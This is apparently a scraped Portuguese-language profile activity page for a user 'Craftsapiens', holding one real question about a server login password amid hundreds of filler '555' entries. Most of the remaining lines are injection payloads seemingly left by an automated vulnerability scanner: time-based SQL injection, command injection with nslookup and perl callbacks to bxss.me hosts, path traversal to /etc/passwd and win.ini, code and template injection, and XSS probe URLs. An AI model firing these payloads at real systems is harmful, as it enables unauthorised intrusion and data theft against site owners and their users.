-
Craftsapiens mudou sua imagem de perfil 3 anos, 4 meses atrás
-
Craftsapiens mudou sua imagem de perfil 3 anos, 4 meses atrás
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
1′”
-
\
-
@@wy1pL
-
JyI=
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
“+”A”.concat(70-3).concat(22*4).concat(106).concat(74).concat(122).concat(77)+(require”socket”
Socket.gethostbyname(“hitby”+”khealxfoee6dc.bxss.me.”)[3].to_s)+” -
555
-
bxss.me/t/xss.html?%00
-
555
-
‘+’A’.concat(70-3).concat(22*4).concat(106).concat(72).concat(103).concat(65)+(require’socket’
Socket.gethostbyname(‘hitsw’+’rcjlblwad2fe6.bxss.me.’)[3].to_s)+’ -
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555&n994436=v956561
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
EJw9BaH2
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
echo mmgfpn$()\ ubtatj\nz^xyu||a #’ &echo mmgfpn$()\ ubtatj\nz^xyu||a #|” &echo mmgfpn$()\ ubtatj\nz^xyu||a #
-
555
-
555
-
&echo aptrne$()\ jifymg\nz^xyu||a #’ &echo aptrne$()\ jifymg\nz^xyu||a #|” &echo aptrne$()\ jifymg\nz^xyu||a #
-
555
-
555
-
|echo zjtfvy$()\ idqisy\nz^xyu||a #’ |echo zjtfvy$()\ idqisy\nz^xyu||a #|” |echo zjtfvy$()\ idqisy\nz^xyu||a #
-
555
-
555
-
(nslookup hitjavlulkwoy9bae7.bxss.me||perl -e “gethostbyname(‘hitjavlulkwoy9bae7.bxss.me’)”)
-
555
-
555
-
$(nslookup hitulmqntfmkg5d067.bxss.me||perl -e “gethostbyname(‘hitulmqntfmkg5d067.bxss.me’)”)
-
555
-
../../../../../../../../../../etc/passwd
-
&(nslookup hitlqzkawykey4267b.bxss.me||perl -e “gethostbyname(‘hitlqzkawykey4267b.bxss.me’)”)&’\”`0&(nslookup hitlqzkawykey4267b.bxss.me||perl -e “gethostbyname(‘hitlqzkawykey4267b.bxss.me’)”)&`’
-
555
-
../../../../../../../../../../windows/win.ini
-
555
-
|(nslookup hittbsukpceno833ca.bxss.me||perl -e “gethostbyname(‘hittbsukpceno833ca.bxss.me’)”)
-
555
-
555
-
`(nslookup hitkkazpzovyh3d1b4.bxss.me||perl -e “gethostbyname(‘hitkkazpzovyh3d1b4.bxss.me’)”)`
-
../555
-
555
-
;(nslookup hitxmdxcwhlnxe5b40.bxss.me||perl -e “gethostbyname(‘hitxmdxcwhlnxe5b40.bxss.me’)”)|(nslookup hitxmdxcwhlnxe5b40.bxss.me||perl -e “gethostbyname(‘hitxmdxcwhlnxe5b40.bxss.me’)”)&(nslookup hitxmdxcwhlnxe5b40.bxss.me||perl -e “gethostbyname(‘hitxmdxcwhlnxe5b40.bxss.me’)”)
-
555
-
555
-
555
-
-1 OR 2+979-979-1=0+0+0+1 —
-
555
-
-1 OR 2+440-440-1=0+0+0+1
-
555
-
-1′ OR 2+752-752-1=0+0+0+1 —
-
555
-
-1′ OR 2+161-161-1=0+0+0+1 or ‘dtEkLaFx’=’
-
-1″ OR 2+286-286-1=0+0+0+1 —
-
555
-
555′
-
if(now()=sysdate(),sleep(12),0)
-
555
-
555
-
0’XOR(if(now()=sysdate(),sleep(12),0))XOR’Z
-
555
-
555
-
555
-
0″XOR(if(now()=sysdate(),sleep(12),0))XOR”Z
-
555
-
555
-
(select(0)from(select(sleep(12)))v)/*’+(select(0)from(select(sleep(12)))v)+'”+(select(0)from(select(sleep(12)))v)+”*/
-
response.write(9752627*9075517)
-
‘+response.write(9752627*9075517)+’
-
-1; waitfor delay ‘0:0:12’ —
-
555
-
“+response.write(9752627*9075517)+”
-
-1); waitfor delay ‘0:0:12’ —
-
${9999721+9999263}
-
1 waitfor delay ‘0:0:12’ —
-
syDHz3Ur’; waitfor delay ‘0:0:12’ —
-
555
-
-5 OR 593=(SELECT 593 FROM PG_SLEEP(12))–
-
555
-
555
-
-5) OR 935=(SELECT 935 FROM PG_SLEEP(12))–
-
555
-
555
-
555
-
555
-
-1)) OR 849=(SELECT 849 FROM PG_SLEEP(12))–
-
555
-
555
-
wSc7lUc4′ OR 70=(SELECT 70 FROM PG_SLEEP(12))–
-
555
-
73TQSkRi’) OR 659=(SELECT 659 FROM PG_SLEEP(12))–
-
555
-
v9v42xDZ’)) OR 989=(SELECT 989 FROM PG_SLEEP(12))–
-
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),12)
-
555’||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),12)||’
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
1some_inexistent_file_with_long_name .jpg
-
555
-
555
-
555
-
;print(md5(31337));
-
bxss.me
-
‘;print(md5(31337));$a=’
-
“;print(md5(31337));$a=”
-
555
-
${@print(md5(31337))}
-
555
-
${@print(md5(31337))}\
-
555
-
555
-
‘.print(md5(31337)).’
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
)
-
‘”()
-
555
-
555
-
!(()&&!|*|*|
-
555
-
^(#$!@#$)(()))******
-
555
-
555
-
555
-
555
-
555
-
555
-
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
-
555
-
‘.gethostbyname(lc(‘hitmf’.’mwrtlrbc8af64.bxss.me.’)).’A’.chr(67).chr(hex(’58’)).chr(108).chr(65).chr(111).chr(76).’
-
555
-
555
-
“.gethostbyname(lc(“hitom”.”qkozspth95e43.bxss.me.”)).”A”.chr(67).chr(hex(“58″)).chr(105).chr(67).chr(107).chr(68).”
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
‘”
-
555
-
<!–
-
555
-
555
-
555
-
/xfs.bxss.me
-
555
-
555
-
555
-
index.php
-
index.php
-
555
-
index.php/.
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555′”()&%2Hxg(9691)
-
‘”()&%2Hxg(9872)
-
5559930245
-
555
-
-
Craftsapiens mudou sua imagem de perfil 3 anos, 4 meses atrás
olá qual é a senha pra botar no logar no server?
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
1′”
\
@@6sex8
JyI=
555
555
555
555
555
555
555
555
555
555
“+”A”.concat(70-3).concat(22*4).concat(120).concat(76).concat(106).concat(85)+(require”socket”
Socket.gethostbyname(“hitxb”+”crhrpfhi2a635.bxss.me.”)[3].to_s)+”
555
‘+’A’.concat(70-3).concat(22*4).concat(113).concat(75).concat(99).concat(88)+(require’socket’
Socket.gethostbyname(‘hitbi’+’hjylxbcwc0827.bxss.me.’)[3].to_s)+’
555
555
555
555
555
555
555
555
http://bxss.me/t/xss.html?%00
555
bxss.me/t/xss.html?%00
555
555
555
555
555
555&n949243=v988897
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
0cjagM3t
555
555
555
555
555
555
555
555
555
echo rfcuji$()\ higwpc\nz^xyu||a #’ &echo rfcuji$()\ higwpc\nz^xyu||a #|” &echo rfcuji$()\ higwpc\nz^xyu||a #
&echo xaaxjm$()\ pytplm\nz^xyu||a #’ &echo xaaxjm$()\ pytplm\nz^xyu||a #|” &echo xaaxjm$()\ pytplm\nz^xyu||a #
|echo spbvjk$()\ qxfncd\nz^xyu||a #’ |echo spbvjk$()\ qxfncd\nz^xyu||a #|” |echo spbvjk$()\ qxfncd\nz^xyu||a #
555
(nslookup hitrcabidaivva1b7d.bxss.me||perl -e “gethostbyname(‘hitrcabidaivva1b7d.bxss.me’)”)
$(nslookup hitxaimevljtr06ee9.bxss.me||perl -e “gethostbyname(‘hitxaimevljtr06ee9.bxss.me’)”)
&(nslookup hitiidamjhrpy0e256.bxss.me||perl -e “gethostbyname(‘hitiidamjhrpy0e256.bxss.me’)”)&’\”`0&(nslookup hitiidamjhrpy0e256.bxss.me||perl -e “gethostbyname(‘hitiidamjhrpy0e256.bxss.me’)”)&`’
555
|(nslookup hitxhhliypord4e88d.bxss.me||perl -e “gethostbyname(‘hitxhhliypord4e88d.bxss.me’)”)
555
`(nslookup hitixlqalwphw33817.bxss.me||perl -e “gethostbyname(‘hitixlqalwphw33817.bxss.me’)”)`
555
;(nslookup hitauzwcgqsrv48e7d.bxss.me||perl -e “gethostbyname(‘hitauzwcgqsrv48e7d.bxss.me’)”)|(nslookup hitauzwcgqsrv48e7d.bxss.me||perl -e “gethostbyname(‘hitauzwcgqsrv48e7d.bxss.me’)”)&(nslookup hitauzwcgqsrv48e7d.bxss.me||perl -e “gethostbyname(‘hitauzwcgqsrv48e7d.bxss.me’)”)
555
../../../../../../../../../../etc/passwd
../../../../../../../../../../windows/win.ini
555
../555
555
555
555
555
555
555
555
555
555
555
555
555
555
${9999833+10000265}
response.write(9983384*9984309)
‘+response.write(9983384*9984309)+’
555
“+response.write(9983384*9984309)+”
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg
1some_inexistent_file_with_long_name .jpg
555
555
http://bxss.me/t/fit.txt
555
http://bxss.me/t/fit.txt?.jpg
555
bxss.me
555
555
555
555
555
;print(md5(31337));
‘;print(md5(31337));$a=’
“;print(md5(31337));$a=”
555
555
${@print(md5(31337))}
555
${@print(md5(31337))}\
555
‘.print(md5(31337)).’
555
555
555
555
555
)
555
555
!(()&&!|*|*|
555
^(#$!@#$)(()))******
555
555
555
555
555
555
‘”()
555
555
555
555
555
-1 OR 2+372-372-1=0+0+0+1 —
‘.gethostbyname(lc(‘hitur’.’ktoynoji61013.bxss.me.’)).’A’.chr(67).chr(hex(’58’)).chr(101).chr(66).chr(110).chr(72).’
-1 OR 2+721-721-1=0+0+0+1
“.gethostbyname(lc(“hitgh”.”hdeucmrv2f9a0.bxss.me.”)).”A”.chr(67).chr(hex(“58″)).chr(120).chr(72).chr(98).chr(74).”
-1′ OR 2+844-844-1=0+0+0+1 —
555
-1′ OR 2+155-155-1=0+0+0+1 or ‘yHNxjYSX’=’
-1″ OR 2+458-458-1=0+0+0+1 —
555
965′
555
555
if(now()=sysdate(),sleep(15.076),0)
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
555
0’XOR(if(now()=sysdate(),sleep(15.076),0))XOR’Z
555
555
0″XOR(if(now()=sysdate(),sleep(15.076),0))XOR”Z
555
555
555
(select(0)from(select(sleep(15.076)))v)/*’+(select(0)from(select(sleep(15.076)))v)+'”+(select(0)from(select(sleep(15.076)))v)+”*/
555
555
-1; waitfor delay ‘0:0:15.076’ —
/xfs.bxss.me
555
555
-1); waitfor delay ‘0:0:15.076’ —
555
555
1 waitfor delay ‘0:0:15.076’ —
555
555
555
wWJYADqP’; waitfor delay ‘0:0:15.076’ —
‘”
<!–
-5 OR 643=(SELECT 643 FROM PG_SLEEP(15.076))–
555
555
555
555
-5) OR 993=(SELECT 993 FROM PG_SLEEP(15.076))–
555
-1)) OR 27=(SELECT 27 FROM PG_SLEEP(15.076))–
555
555
555
555
tzejZwOP’ OR 681=(SELECT 681 FROM PG_SLEEP(15.076))–
555
index.php
index.php
index.php/.
ZfDAaVWU’) OR 973=(SELECT 973 FROM PG_SLEEP(15.076))–
555
1veEnqsi’)) OR 106=(SELECT 106 FROM PG_SLEEP(15.076))–
555
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15.076)
555
555
555’||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15.076)||’
555
555
555
555
555
555
555
555
555
555
555′”()&%XKlE(9563)
‘”()&%XKlE(9639)
555
5559375844
555
555